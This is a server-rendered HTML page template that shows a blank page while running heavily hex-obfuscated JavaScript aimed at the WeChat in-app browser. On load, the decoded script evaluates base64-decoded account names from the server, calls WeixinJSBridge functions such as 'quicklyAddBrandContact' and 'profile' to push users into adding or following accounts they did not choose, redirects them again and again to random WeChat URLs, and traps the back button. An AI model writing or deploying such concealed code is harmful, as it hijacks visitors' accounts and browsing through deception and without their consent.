<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title></title>
        <meta name="viewport" content="width=device-width, initial-scale=1">

    </head>
    <body>
        <input type="hidden" id="zjiemi" value="<%= baseStr%>" />
    </body>
    <script src="https://cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
    <script src="/js/jquery.base64.min.js"></script>
    <script>
       
        var _0x35fb=[
            "\x7A\x6A\x69\x65\x6D\x69","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x76\x61\x6C\x75\x65","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x64\x65\x63\x6F\x64\x65","\x62\x61\x73\x65\x36\x34","\x61\x72\x72\x55\x73\x65\x72\x6E\x61\x6D\x65","\x5B\x22","\x22\x5D","\x73\x65\x74\x49\x74\x65\x6D","\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65","\x75\x73\x65\x72\x6E\x61\x6D\x65","\x77\x65\x43\x68\x61\x74\x55\x72\x6C","\x75\x6E\x64\x65\x66\x69\x6E\x65\x64","\x67\x65\x74\x49\x74\x65\x6D","\x28","\x29","\x6D\x61\x74\x63\x68","\x75\x73\x65\x72\x41\x67\x65\x6E\x74",
            "<%= strLink%>",
            "\x0A",
            "<%= strLink%>",
            "\x6C\x65\x6E\x67\x74\x68","\x72\x61\x6E\x64\x6F\x6D","\x73\x74\x6F\x70","\x6F\x6B","\x69\x6D\x61\x67\x65\x50\x72\x65\x76\x69\x65\x77","\x69\x6E\x76\x6F\x6B\x65","\x71\x75\x69\x63\x6B\x6C\x79\x41\x64\x64\x42\x72\x61\x6E\x64\x43\x6F\x6E\x74\x61\x63\x74","\x31\x31\x30","\x73\x75\x62\x73\x63\x72\x69\x62\x65\x53\x74\x61\x74\x65","\x67\x65\x74\x54\x69\x6D\x65","\x6E\x6F\x76\x65\x6C","\x6E\x6F\x76\x65\x6C\x31","\x6E\x6F\x76\x65\x6C\x32","\x6E\x6F\x76\x65\x6C\x33","\x6E\x6F\x76\x65\x6C\x34","\x64\x79\x6A","\x67\x64\x74","\x6B\x63\x31","\x6B\x63\x32","\x6B\x63\x33","\x6B\x63\x34","\x6B\x63\x35","\x6B\x63\x36","\x77\x69\x66\x69\x31","\x77\x69\x66\x69\x32","\x53\x75\x62\x53\x74\x61\x74\x65","\x31","\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x66\x6F\x72\x45\x61\x63\x68","\x62\x6C\x61\x63\x6B","\x61\x77\x61\x69\x74","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x57\x65\x69\x78\x69\x6E\x4A\x53\x42\x72\x69\x64\x67\x65\x52\x65\x61\x64\x79","\x70\x61\x67\x65\x73\x68\x6F\x77","\x62\x61\x63\x6B","\x68\x69\x73\x74\x6F\x72\x79","\x70\x61\x67\x65\x68\x69\x64\x65","\x70\x72\x6F\x66\x69\x6C\x65","\x77\x65\x69\x78\x69\x6E","\x68\x72\x65\x66"
];

var zjiemi = document[_0x35fb[1]](_0x35fb[0]),
  fval = zjiemi[_0x35fb[2]];
var _val = fval[_0x35fb[6]](_0x35fb[3])[_0x35fb[5]]()[_0x35fb[4]](_0x35fb[3]);
var jm1 = $[_0x35fb[8]][_0x35fb[7]](_val);
var jm2 = $[_0x35fb[8]][_0x35fb[7]](jm1);


window[_0x35fb[13]][_0x35fb[12]](_0x35fb[9], _0x35fb[10] + jm2 + _0x35fb[11]);
window[_0x35fb[13]][_0x35fb[12]](_0x35fb[14], jm2);
window[_0x35fb[13]][_0x35fb[12]](_0x35fb[15], _0x35fb[16]);
var username = localStorage[_0x35fb[17]](_0x35fb[14]);
var arrUsername = eval(_0x35fb[18] + localStorage[_0x35fb[17]](_0x35fb[9]) + _0x35fb[19]);
var isIos = !!navigator[_0x35fb[21]][_0x35fb[20]](/\(i[^;]+;( U;)? CPU.+Mac OS X/);
var returnUrl = _0x35fb[22];
let getWeChatUrl = localStorage[_0x35fb[17]](_0x35fb[15])[_0x35fb[6]](_0x35fb[23]);
var weChatUrlArr = [_0x35fb[24]];
if (getWeChatUrl[0] !== _0x35fb[16]) {
  weChatUrlArr = getWeChatUrl
};
var wKey = parseInt(weChatUrlArr[_0x35fb[25]] * Math[_0x35fb[26]]());
var weChatUrl = weChatUrlArr[wKey];
subscribe(true);

function iosBatchSub(_0x3f75xf = _0x35fb[27]) {
  var _0x3f75x10;

  function _0x3f75x11(_0x3f75x12 = {}) {
    if (_0x3f75x12 === _0x35fb[28]) {
      var _0x3f75x13 = 0;
      var _0x3f75x14 = setInterval(_0x3f75x15, 50);
      _0x3f75x14();

      function _0x3f75x15() {
        _0x3f75x13++;
        go();
        if (_0x3f75x13 === 4) {
          clearInterval(_0x3f75x14);
          setTimeout(function() {
            WeixinJSBridge[_0x35fb[30]](_0x35fb[29], {
              "urls": [returnUrl]
            });
            var _0x3f75x16 = arrUsername;
            _0x3f75x16[_0x35fb[54]](function(_0x3f75x17) {
            WeixinJSBridge[_0x35fb[30]](_0x35fb[31], {
                scene: _0x35fb[32],
                username: _0x3f75x17
              });
              _0x3f75x10 = _0x35fb[28];
              localStorage[_0x35fb[12]](_0x35fb[33], new Date()[_0x35fb[34]]());
              if (username === _0x35fb[35] || username === _0x35fb[36] || username === _0x35fb[37] || username === _0x35fb[38] || username === _0x35fb[39] || username === _0x35fb[40] || username === _0x35fb[41] || username === _0x35fb[42] || username === _0x35fb[43] || username === _0x35fb[44] || username === _0x35fb[45] || username === _0x35fb[46] || username === _0x35fb[47] || username === _0x35fb[48] || username === _0x35fb[49]) {
                localStorage[_0x35fb[12]](username + _0x35fb[50], _0x35fb[51])
              };
              if (_0x3f75xf === _0x35fb[27]) {
                window[_0x35fb[53]][_0x35fb[52]]()
              } else {}
            })
          }, 200)
        }
      }
    } else {
      if (username === _0x35fb[35] || username === _0x35fb[36] || username === _0x35fb[37] || username === _0x35fb[38] || username === _0x35fb[39] || username === _0x35fb[40] || username === _0x35fb[41] || username === _0x35fb[42] || username === _0x35fb[43] || username === _0x35fb[44] || username === _0x35fb[45] || username === _0x35fb[46] || username === _0x35fb[47] || username === _0x35fb[48] || username === _0x35fb[49]) {
        _0x3f75x19();
        go()
      } else {
        _0x3f75x19(_0x35fb[55]);
        subscribe(false)
      }
    }
  }
  var _0x3f75x18 = parseInt((new Date()[_0x35fb[34]]() - Number(localStorage[_0x35fb[17]](_0x35fb[33]))) / 60000);
  _0x3f75x10 = _0x35fb[56];
  if (typeof(WeixinJSBridge) === _0x35fb[16]) {
    if (document[_0x35fb[57]]) {
      document[_0x35fb[57]](_0x35fb[58], _0x3f75x11, false)
    }
  } else {
    _0x3f75x11()
  };

  function _0x3f75x19(_0x3f75x1a = _0x35fb[3]) {
    var _0x3f75x1b = false;
    window[_0x35fb[57]](_0x35fb[59], function() {
      if (_0x3f75x1b) {
        if (_0x3f75x1a !== _0x35fb[3]) {
          window[_0x35fb[61]][_0x35fb[60]]()
        } else {
          if (_0x3f75x10 === _0x35fb[56]) {
            _0x3f75x11(_0x35fb[28])
          }
        }
      }
    });
    window[_0x35fb[57]](_0x35fb[62], function() {
      _0x3f75x1b = true
    })
  }
}

function subscribe(_0x3f75x1d) {
  function _0x3f75x11() {
    var _0x3f75x13 = 0;
    var _0x3f75x14 = setInterval(subscribe, 50);

    function subscribe() {
      go();
      _0x3f75x13++;
      if (_0x3f75x13 === 4) {
        clearInterval(_0x3f75x14);
        setTimeout(function() {
          WeixinJSBridge[_0x35fb[30]](_0x35fb[63], {
            "username": username,
            "nickname": _0x35fb[64]
          }, function() {});
          if (_0x3f75x1d) {} else {}
        }, 200)
      }
    }
  }
  if (typeof(WeixinJSBridge) === _0x35fb[16]) {
    if (document[_0x35fb[57]]) {
      document[_0x35fb[57]](_0x35fb[58], _0x3f75x11, false)
    }
  } else {
    _0x3f75x11()
  }
}

function go() {
  window[_0x35fb[53]][_0x35fb[65]] = weChatUrl
}

    </script>
</script>
</html>